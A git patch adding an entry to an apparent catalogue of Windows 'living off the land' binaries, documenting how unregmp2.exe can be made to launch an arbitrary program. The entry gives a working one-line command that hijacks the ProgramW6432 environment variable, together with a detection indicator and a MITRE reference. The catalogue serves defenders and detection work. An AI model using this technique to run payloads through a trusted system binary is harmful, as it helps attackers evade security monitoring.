From 18bceb7639ad276a12bab108b24be5f4e54f8556 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Mon, 6 Dec 2021 12:13:24 -0500 Subject: [PATCH] Create Unregmp2.yml Added a new lolbin, unregmp2.exe, used for proxying execution. --- yml/OSBinaries/Unregmp2.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 yml/OSBinaries/Unregmp2.yml diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml new file mode 100644 index 0000000..427afea --- /dev/null +++ b/yml/OSBinaries/Unregmp2.yml @@ -0,0 +1,24 @@ +--- +Name: Unregmp2.exe +Description: Microsoft Windows Media Player Setup Utility +Author: 'Wade Hickey' +Created: 2021-12-06 +Commands: + - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" + Description: Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\wmpnscfg.exe'. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\unregmp2.exe + - Path: C:\Windows\SysWOW64\unregmp2.exe +Detection: + - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP` +Resources: + - Link: https://twitter.com/notwhickey/status/1466588365336293385 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +---